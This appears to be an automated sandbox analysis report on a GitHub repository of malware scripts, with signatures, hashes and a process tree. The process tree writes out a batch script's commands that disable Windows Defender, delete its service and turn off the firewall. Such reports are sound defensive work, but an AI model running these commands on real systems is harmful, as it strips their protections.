Analysis
-
max time kernel
127s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/11/2024, 08:52
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/SantiagoPujana/MalwareScripts
Resource
win10v2004-20241007-en
General
-
Target
https://github.com/SantiagoPujana/MalwareScripts
Malware Config
Signatures
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3692 netsh.exe 3456 netsh.exe -
Executes dropped EXE 2 IoCs
pid Process 4384 ScreenMelter.exe 992 FullMemory.exe -
pid Process 2596 powershell.exe 1852 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 30 camo.githubusercontent.com 31 camo.githubusercontent.com 32 camo.githubusercontent.com 61 raw.githubusercontent.com 62 raw.githubusercontent.com -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4800 sc.exe 2400 sc.exe 2480 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenMelter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FullMemory.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763071872342857" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings chrome.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 1704 reg.exe 2392 reg.exe 3248 reg.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 3392 chrome.exe 3392 chrome.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 1852 powershell.exe 1852 powershell.exe 1852 powershell.exe 2536 chrome.exe 2536 chrome.exe 2536 chrome.exe 2536 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe Token: SeShutdownPrivilege 3392 chrome.exe Token: SeCreatePagefilePrivilege 3392 chrome.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe 3392 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3392 wrote to memory of 2960 3392 chrome.exe 83 PID 3392 wrote to memory of 2960 3392 chrome.exe 83 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 760 3392 chrome.exe 84 PID 3392 wrote to memory of 4500 3392 chrome.exe 85 PID 3392 wrote to memory of 4500 3392 chrome.exe 85 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86 PID 3392 wrote to memory of 2108 3392 chrome.exe 86
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/SantiagoPujana/MalwareScripts1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffafe10cc40,0x7ffafe10cc4c,0x7ffafe10cc582⤵PID:2960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:22⤵PID:760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:32⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2572 /prefetch:82⤵PID:2108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:12⤵PID:1088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3132,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:12⤵PID:916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3756 /prefetch:82⤵PID:4412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4828,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:82⤵PID:644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3868,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:82⤵PID:4384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4936,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:82⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5008,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:82⤵PID:2640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5248,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:82⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5260,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:82⤵PID:2016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5300,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:82⤵PID:3612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5104,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:12⤵PID:1280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=980,i,5625696764003225644,18091626587228613615,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2536
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2760
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1612
-
C:\Users\Admin\Desktop\ScreenMelter.exe"C:\Users\Admin\Desktop\ScreenMelter.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4384
-
C:\Users\Admin\Desktop\FullMemory.exe"C:\Users\Admin\Desktop\FullMemory.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:992
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win64.bat" "1⤵PID:396
-
C:\Windows\system32\reg.exereg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1704
-
-
C:\Windows\system32\reg.exereg add HKLM\Software\Policies\Microsoft\WindowsDefender /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:2392
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WinDefend\Security /f2⤵
- Modifies registry key
PID:3248
-
-
C:\Windows\system32\gpupdate.exegpupdate /force2⤵PID:3180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Restart-Service -Name WinDefend -Confirm:$false -Force2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752
-
-
C:\Windows\system32\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:4800
-
-
C:\Windows\system32\sc.exesc query WinDefend2⤵
- Launches sc.exe
PID:2400
-
-
C:\Windows\system32\sc.exesc delete WinDefend2⤵
- Launches sc.exe
PID:2480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-NetFirewallProfile -Enabled False2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3692
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3456
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD5073d2d1f5afb5732236e939c0f259453
SHA18bf64fccb5a35df236f322ce95de1dd19a31a5a1
SHA256c8e860634b94e4a52bdc84987fb8311deaf0d6704fad629b8ff553a1a511069e
SHA51221dc80ce515562eeb520463a43e84b5e26a3604504091c47c5ee377c06afe9d71d732f6ed4f952682828a78e986819585156e5fdd7e20309739b001f1e1f2530
-
Filesize
215KB
MD5e579aca9a74ae76669750d8879e16bf3
SHA10b8f462b46ec2b2dbaa728bea79d611411bae752
SHA2566e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf
SHA512df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640
-
Filesize
2KB
MD59bd40c38355785a81c6710b7e96decf6
SHA1091fa9e4c17177a764ac1160984decb8d8e08bb8
SHA2560c73b86d0ab84ef87e670c8f7b4a5334b42dae4a6ca813dcc2b1f0ae7148db39
SHA512ff4768953b7eb3f6838bfc885dc578e6efa8bd4a04892e843b9b866dc1677d1861dff816b3b0294592e70bcb7493aa724c81584d9da8806fdb06879ea66114f3
-
Filesize
2KB
MD53bda54957329399e01369d366d01868b
SHA157b7c4ab48ee910bda91bab3d3ae3e938f0d0148
SHA256c5cf894c14c37c6b34a9c32365767a53b73c1ad554664c980ffed693258b1757
SHA5120221e125ee31169c12ad8dbaf27b3c09eabbb220a52c6ae8d332141c3f0223d037702dc058f582a86d92ba44819f9c25f18be7ae87f8b67dd5790a5ee6d79e20
-
Filesize
2KB
MD5d8d5b44fb839ede3d75feda67fa99c71
SHA14b633eee81202091940d2be98bfa1141bfc8754f
SHA256e2c84b67be6e3a97126451d1d4073a8beb171b1df0df955e40a8a2c964c9f4f5
SHA5126cc2d8ead16814a0828e4e52fbcbda4b2bed92805b68c4d07f7191fe292e34a514890a4e2e474f0c571a2cea65527c9e22eea0a863a0ccfe3aca556cefbe6641
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
1KB
MD53f79900a8ee54ebbc79263af85798e2c
SHA1202f1eea059c97cef8e0b9ed4ee6ceb482d917e5
SHA2568d25b64ce714dd9f63176b2f6b9c01397c76e2193a8df988bee10a1520972256
SHA512fae8934040cdab50f89fce1afb54bc2e912efef0f8ad9a3729a4f6344f6685b765b3ea2a2cdbbde245bde4f32c49454af2bc2739f4e33045292abac7a864911b
-
Filesize
1KB
MD592d25c80f9e51b974164cf1cef8ff9ac
SHA1edf7d0477c60b796fbe9bc6ea529730245a885d0
SHA2561b989eeb235c944aa0d5faf07990ee47155d38e954a12d3ccbff34b6c83aba2b
SHA512a74ccb4a283d48bbceab1f90dc59b800b9abd850ec6d5f5cea69c9c1e7b68086aa171bc018bec7e075e1f172f3b59e76611c3b0b4b504be3bc4e62e134927a7d
-
Filesize
1KB
MD568103ea7a4503dd93424400eb8cf6685
SHA1828412d712bcfeeb940bb7482230b8d1a67f0e40
SHA256db7fd66761785e06b5ff0b7815b16484ec47d55419ea9a44e9b60289bf1b19ee
SHA5129ee3db3df3e73edd20faa9bca68c958db89bdb19ec4113d6388524dd16885452a66c46a769fdc3b3cd46d73287cc3ff88bc3475bae6febc68c2d5229edad8253
-
Filesize
1KB
MD521d3f83b943683f20d13b27b8555abbb
SHA13a0602b4b701ac3916abf990d1d48f754c87b75a
SHA2568692a9c4971fdf97d106843159799f505cab152407a7d632c560eefa4c33e75a
SHA51238197634ad5f4dda5d53d711ae2cdcf7fac7b6bb6c26e24dcf20790abde06c0dcff38ac3d332eed6c393d8cf311aa402d33f4e33072c81058a9b49b28f1910f0
-
Filesize
1KB
MD5da190c584ad1b88fcd51f04685dd218c
SHA11b5d7c1d5cfd2806d39fb80ca97d8c71b24d65eb
SHA2562ae4d64370bb0154a140b94f709bb3cb555cf08b40caa4ea4da3d0d7890df39b
SHA5120cf93ce7ad4190152c62d2d8661bb25a3feb6cf314fc79d93561088a974c3febbdd61bb287a02c1b7a7cfafa031bcee550238b3e4b9ce7224f9ac38dbf3a7a08
-
Filesize
1KB
MD5ba1d1bce374bf5d57dd33b02a9a13bf8
SHA147b8e855bb9e6b15f610240ff06e4bc9707780f0
SHA256dc226f71609df0a7bec1ea2b4fbe5250205bddbac74a2e94684b5619b1c16348
SHA51295b3b08818818c5c598e4ab52f913e13041b180e5e340993c9cae9391c368911064c3093fd743899206cd5a576b624ec116c27c170d5ca89a7217f4de656a865
-
Filesize
10KB
MD51dac7711129c58c4bb96f4ac5887e369
SHA13fe0460d5b525506a7b8c2220d7d2eef636ccb26
SHA25604e7920e3bb85d8daf3f229eaa81637d37a12dd4be9df417c8f7967cd33e9d4f
SHA512a4c420a4028288189b10f52dd6e7a2989668fabd0b3fe972ed918c263a5b2e83d0c43c0d03a3aa3bd0377b0cbc7344aa770ec7f2c7aae2d7040dfa4fac0dacaf
-
Filesize
10KB
MD50971dfb36bf506eb1e9e7d6f3d112c33
SHA1bceed14aacb94e5b5018399beaf81491e11dcf1b
SHA256dcb18bb8eef41072edd044a3dfc52764688246dba06b8d0fa6e9594fc05e9b0a
SHA512c3f223f64b3af132cfb89505dee888186803c2cb4c09468c3093d69775dc217bece7f50ba7c93f779a5b95572311e7ee9933a7bdeb8566aad79f57446a1b1fc7
-
Filesize
10KB
MD51e0250b216bab7819e7880d2ba2e12a5
SHA1ca991537aa702ce066f1154355852eb09c378233
SHA256467583ce06284a410b1817659d6c040deb17d3d7fccdfcb4a8240ff2a888a6c1
